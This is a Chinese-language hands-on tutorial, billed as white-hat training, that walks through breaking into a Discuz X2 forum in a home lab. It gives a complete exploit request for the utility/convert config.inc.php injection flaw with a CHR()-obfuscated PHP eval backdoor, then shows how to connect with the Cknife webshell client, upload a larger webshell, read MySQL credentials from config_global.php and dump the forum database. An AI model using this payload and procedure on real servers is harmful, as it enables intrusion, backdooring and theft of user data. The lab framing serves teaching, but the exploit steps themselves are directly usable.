20分钟攻破DISCUZ论坛并盗取数据库（web安全白帽子）

1 快速搭建discuz论坛
- 1.1 攻击思路
- 1.2 快速搭建实验环境
- - 1.2.1，漏洞概述
  - 1.2.2，在centos7虚拟机上搭建LAMP环境
  - 1.2.3，上传到discuz_X2_SC_UTF8.zip 到Linux系统/root下
  - 1.2.4.浏览器输入http://192.168.0.101安装配置discuz论坛
2 使用kali下burpsuite对discuz后台注入PHP木马
3 使用Cknife “菜刀”上传webshell木马到网站
- 3.1 在kali上配置java环境
- 3.2 使用菜刀连接discuz论坛上面的PHP后门程序
- 3.3 上传功能更强大的木马文件webshell2.php
- 3.4 任意机器访问我们的webshell2.php木马文件
4 使用webshell查看mysql数据库密码并盗取数据库
总结

1 快速搭建discuz论坛

1.1 攻击思路

想要拿下一台主机A的权限：
（1）了解一下这个服务器：端口，服务器版本，操作系统版本。找漏洞
（2）拿到对A有一定权限的身份。如果对方是一个web服务器，就利用对方网站应用程序的漏洞，上传webshell然后提权
（3）传上去后，得到Apache用户普通权限，再提权成root

1.2 快速搭建实验环境

搭建一个LAMP环境。部署带有漏洞的discuz论坛

1.2.1，漏洞概述

这漏洞出现在一个DZX系列自带的转换工具里面
漏洞路径：utility/convert/data/config.inc.php
漏洞发生的原因是：config.inc.php这个文件在黑客通过post写入时，无任何过滤检测，所以黑客可以通过post方式往config.inc.php中写木马程序。（所有做开发的东西从外网上获取数据时，不知此数据是否危险都要做过滤，但很多网站开发人员不知道做这一步过滤）

触发漏洞的过程：
（1）在浏览器中访问打开http://192.168.1.63/utility/convert/index.php
（2）使用utility/convert/index.php进行版本转换时，会自动创建utility/convert/data/config.inc.php文件（utility 效用）
（3）config.inc.php文件（这个新建的文件）没有做过滤，黑客可以使用post方法对config.inc.php注入木马程序

渗透思路：
burp suite 可以抓包，和wireshark一样，还能改包内的内容

在这里插入图片描述

1.2.2，在centos7虚拟机上搭建LAMP环境

# yum -y install httpd mariadb-server mariadb php php-mysql   #安装LAMP环境

参数：mariadb-server 这是mysql数据库的一个分支
mariadb  就是它的客户端了
php-mysql 是专门用来连接mariadb 的一个工具
#systemctl start httpd				//启动Apache
#systemctl start mariadb			//启动数据库
#mysqladmin	-u root password “电脑密码”	//给数据库配个密码
#mysql -u root -p密码				//登录数据库

1.2.3，上传到discuz_X2_SC_UTF8.zip 到Linux系统/root下

此处使用xshell连接虚拟机，注意使用桥接模式且使用路由器的网

上传之后使用

#rz				//此处使用命令上传（因不含命令，我变使用ftp上传）
[root@localhost ~]# unzip Discuz_X2_SC_UTF8_0628.zip  	//直接解压缩到当前目录下(也有可能未找到该命令，则yum -y install zip unzip来下载此命令)
# ls
//此时解压出很多东西，若搭建网站需要两个，一个upload，一个utility（漏洞就在此目录下），
[root@localhost ~]# mv upload/* /var/www/html/		//将upload下的所有东西放到网站根目录
[root@localhost ~]# mv utility/ /var/www/html/		//将utility（可以理解成一个工具，比如说版本更新等工具，无*）也传到此目录下
[root@localhost ~]# ls /var/www/html/
admin.php  config           data         home.php    misc.php    search.php  uc_client
api        connect.php      favicon.ico  index.php   plugin.php  source      uc_server
api.php    cp.php           forum.php    install     portal.php  static      userapp.php
archiver   crossdomain.xml  group.php    member.php  robots.txt  template    utility
[root@localhost ~]# cd /var/www/html/
[root@localhost html]# ll				//进入可查看这些文件的权限，要将其拥有者权限root修改，若不修改，别人是无法上传文件的（如修改自己图像），凭什么能上传自己的头像，因为上传时使用的是Apache的身份，我们的进程就是以Apache进行的（ps -axu | grep apache）
[root@localhost html]# chown -R apache:apache uc_server/ data/ config/ uc_client/
//修改权限
[root@localhost html]# chown -R apache:apache utility/convert/data/
//还需要修改data的权限（专门存数据的，临时数据）
[root@localhost html]# iptables -F
//清空防火墙，不然80端口出不来
[root@localhost html]#	setenforce 0
//确保setlinux关闭，可以用setenforce 0命令执行。 默认的，SELinux禁止网络上对Samba服务器上的共享目录进行写操作，即使你在smb.conf中允许了这项操作。

1.2.4.浏览器输入http://192.168.0.101安装配置discuz论坛

安装成功后刷新一下，或重新进入此IP就出界面了
此网站在内网，放到外网其他人就可以访问了

2 使用kali下burpsuite对discuz后台注入PHP木马

使用kali自带的火狐浏览器访问百度看其能否正常上网，接着在访问网站IP之前，打开burpsuit（是一个抓包工具，抓的是http协议）

（1）在火狐浏览器中要设计一个代理，即在右侧点击preferences属性，拉倒最下方打开setting，选择手动manul proxy configuration

（2）抓包，burpsuit默认启动后，打开proxy选项，点击“intercept is on”，变为“intercept is off”，因为我们要先访问我们的论坛，先关闭拦截，若是所有数据都被拦截了就无法调数据了，所以只拦截最后的请求，拦截最需要的东西。

（3）浏览器进行操作抓包，在kali上，打开注入漏洞的地方：http://192.168.0.106/utility/convert/
这是discuz产品升级的漏洞，随便点击一个页面，点开始弹出向导

注意：在点击开始时会产生问题，所以点击之前，因为走的代理，所以请求会转给这个代理，所以此处要开启抓包点击intercept is on，此时就开始拦截了，这样当前浏览器所有的http请求都会被拦截，点击开始，网页不停刷新是因为没有接到请求
如果之前抓到了别的数据包，需要先点击forward，把之前的http请求都放行了，然后再访问我们需要访问的连接（看地址就能看到）。

在burpsuit就会出现下方消息，就能get下方消息（凡是可以get的地方，就要尝试着去注入一句话木马）
GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

Host: 192.168.0.106

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.0.106/utility/convert/

Connection: close

Upgrade-Insecure-Requests: 1

此时已经抓取到了http请求接下来要注入木马，怎么注入是不能在此直接修改的需要右击空白处（sent to repeater请求转给中继器），这样整个的数据包就拦截下来了，就可以修改了
接着点击repeater选项，修改request信息，将get请求改为post，因为这个包在自己手里，想怎么改就怎么改。改为下方
修改第一行：
GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1
为：注意POST后面没有回车键，这里是文本显示自动换行了。
POST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes HTTP/1.1
注：这是一个PHP一句话木马加密后的内容。翻译后的内容：
&newconfig[aaa%0a%0d eval(‘$_POAT[c];’);//]=aaaa&submit=yes
注：%0a%0d 阿斯克码的回车换行
再转换
POST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0d eval(‘$_POAT[c];’);//]


扩展eval（）函数：
Eval函数中的eval是evaluate的简称，这个函数的作用就是把一段字符当做PHP语句来执行，一般情况下不建议使用容易被黑客利用。
Eval（‘echo’hello worrld’;’）等同于（PHP直接执行）下边的代码：
Echo ‘hello world’；在浏览器中输出：hello world

接着点击go(send)，返回200k成功，现在已经注入成功，要看木马在哪，打开Linux服务器
下面在Linux中查看注入的木马所在地
[root@localhost ~]# cd /var/www/html/utility/convert/data/
[root@localhost data]# ls
config.default.php  config.inc.php
[root@localhost data]# ll
总用量 8
-rw-r--r--. 1 apache apache  935 6月  27 2012 config.default.php
-rw-r--r--. 1 apache apache 1481 11月 15 14:53 config.inc.php
[root@localhost data]# vi config.inc.php 

注意注入的木马是免杀的，一般情况下过滤不出来，一般过滤的是eval这个函数
在这个配置文件中有很多的^M符号
扩展：^M符号

^M字符的来历和作用：在DOS/windows里，文本文件的换行符为\r\n,而在Linux系统里则为\n，所以DOS/windows里编辑过的文本文件到了Linux里，每一行都多了个^M。所以^M只是个换行符号，没有实际的用处，我们可以将它保留，也可以将它删除
%0a%0d 等于\r\n

那么这个一句话木马怎么用（会使用菜刀来用它）

3 使用Cknife “菜刀”上传webshell木马到网站

3.1 在kali上配置java环境

搭建java环境（我们是基于java开发的）

[root@localhost ~]# yum install -y java
//注意我们现在是在此服务器上直接安装中国菜刀的，并不是在kali上安装的
很多人高渗透用的菜刀是windows下的，建议使用Linux下的会更安全一些
自动安装的是openjdk开源的

查看java版本
[root@localhost ~]# java -version
openjdk version "1.8.0_232"
OpenJDK Runtime Environment (build 1.8.0_232-b09)
OpenJDK 64-Bit Server VM (build 25.232-b09, mixed mode)

3.2 使用菜刀连接discuz论坛上面的PHP后门程序

接着上传菜刀（cknife.jar）使用ftp即可直接上传到根目录
注意：jar包的获取可看此文章https://www.cnblogs.com/ownhp/p/9094896.html
注意从Github上下载下来的cknife-master需要在myeclipse上运行一下其配置文件才会出现，并且此项目是运行在jdk1.7版本的，所以选好运行环境后，再运行一下，接着导出成可运行的jar包运行在Linux上

[root@localhost ~]# ls
anaconda-ks.cfg  CKnife.jar  Discuz_X2_SC_UTF8_0628.zip  readme  upload  ╦╡├ў.htm

传完东西后运行一下中国菜刀
[root@localhost ~]# java -jar Cknife.jar 

接着会出来一个界面，就能右击添加，如果打开程序后，看到是乱码的，我们更换一下皮肤科解决乱码问题
右击添加，会出现添加shell，选择连接即可，地址172.20.10.10/utility/convert/data/config.inc.php，密码就是前面注入程序的‘c’,
脚本类型选择PHP，字符编码选择GB2313，接着点击添加就行了
之后就行了吗，双击出现的地址，看到了什么，看到了所有的文件，接着我们还是在data文件下上传webshell2.php木马，为什么要上传大马，因为这个功能是非常强大的。小马（一句话木马）功能单一只有上传下载功能，而大马功能强大，是可以用任意机器访问此webshell了。

3.3 上传功能更强大的木马文件webshell2.php

注：这里需要上传到Apache用户有写权限的目录中，因为安装过程中discuz需要管理员修改部分权限为Apache用户，所以必然有可以上传文件的目录，我们可以直接上传到data（此目录下是有Apache权限的）目录下。
https://blog.csdn.net/weixin_45178890/article/details/98121719
此链接上有大小马程序，通过之前的一句话木马来上传此大马程序，可以试试。大马程序已改成“招财猫”。
在菜刀的界面上右击上传我们的大马程序。这就上传到data文件下了。

3.4 任意机器访问我们的webshell2.php木马文件

172.20.10.10/utility/convert/data/da.php 在浏览器输入此地址后，接着会要求输入密码这个选项，输入密码之后就能在网站登录别人的后台了，登上后可以管理任何文件

4 使用webshell查看mysql数据库密码并盗取数据库

第四步骤已经链接上了，第五个步骤要用webshell盗取mysql的数据库了，有思路没，首先要知道数据库密码，在网站的根目录下都有一个config（/var/www/html/config）这样的目录，在这目录下有个config_global.php,所有网站都要连接数据库，既然连接数据库那么就有一个配置文件存着mysql的账号和密码。编辑此文件config_global.php，无论是java，python，PHP都有这样的文件，我们明确看到了此文件内的数据库账号和密码，看到很清楚，这样就能连上数据库就能很清楚的看到我们想要的数据了。登录数据库用密码，选择自己想要看到数据库，例如ultrax我们的discuz论坛就在此库中，在这有很多很多的，接着就是脱库（将数据库导出来），可以选择所有的数据库将其导出来，可以选择某个表导出（就是下载到本地）。这个导出功能在视频中有，现在这个大马应该是没有。
有同学说能不能给提个权注个木马，可以现在的大马就能提权。
到此结束了，我们可以使用Apache用户进行提权操作。然后我们就有了root权限了。因为大家还不会向里埋后门。

总结

1 快速搭建discuz论坛
2 使用kali下burpsuite对discuz后台注入PHP木马
3 使用cknife “菜刀” 上传webshell 木马到网站
4 使用webshell查看mysql数据库密码并盗取数据库

第一个先搭好论坛，搭好论坛后不是想向论坛注入数据吗，如果正常通过浏览器访问是永远也干不了坏事的，此时需要找个人篡改一下包，所以我的浏览器才需要代理上网，浏览器使用代理上网，所有的数据都交给了代理，那么代理抓到所有的数据后可以篡改你的数据，篡改数据后再将数据进行注入，注入完了后通过菜刀连接上去，连接上去后可以上传很多文件，就上传webshell，可以非常方便的看到数据库密码，看到密码后下载数据库是非常轻松的事。